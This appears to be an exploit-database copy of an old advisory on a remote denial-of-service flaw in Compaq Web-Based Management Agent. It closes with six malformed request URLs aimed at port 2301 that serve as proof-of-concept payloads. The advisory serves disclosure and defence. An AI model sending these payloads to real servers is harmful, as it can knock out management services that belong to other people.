Compaq Web-Based Management Agent Remote Denial of Service Vulnerability

vendor:

Web-Based Management Agent

by:

SecurityFocus

6.4

CVSS

MEDIUM

Denial of Service

400

CWE

Product Name: Web-Based Management Agent

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: N/A

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2002

Compaq Web-Based Management Agent Remote Denial of Service Vulnerability

Compaq Web-Based Management Agent has been reported prone to a remote denial of service vulnerability. The problem occurs when making malformed requests to the service. The resulting error reports a stack overflow, however it has not been confirmed whether this issue is exploitable to corrupt memory. The problem may in fact be the result of a NULL pointer dereference.

Mitigation:

Ensure that all requests to the service are validated and that malicious requests are rejected.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/8014/info

Compaq Web-Based Management Agent has been reported prone to a remote denial of service vulnerability. The problem occurs when making malformed requests to the service. The resulting error reports a stack overflow, however it has not been confirmed whether this issue is exploitable to corrupt memory. The problem may in fact be the result of a NULL pointer dereference.

http://www.example.com:2301/survey/<!>
http://www.example.com:2301/<!.StringRedirecturl>
http://www.example.com:2301/<!.StringHttpRequest=Url>
http://www.example.com:2301/survey/<!.StringHttpRequest=Url>
http://www.example.com:2301/<!.ObjectIsapiECB>
http://www.example.com:2301/<!.StringIsapiECB=lpszPathInfo>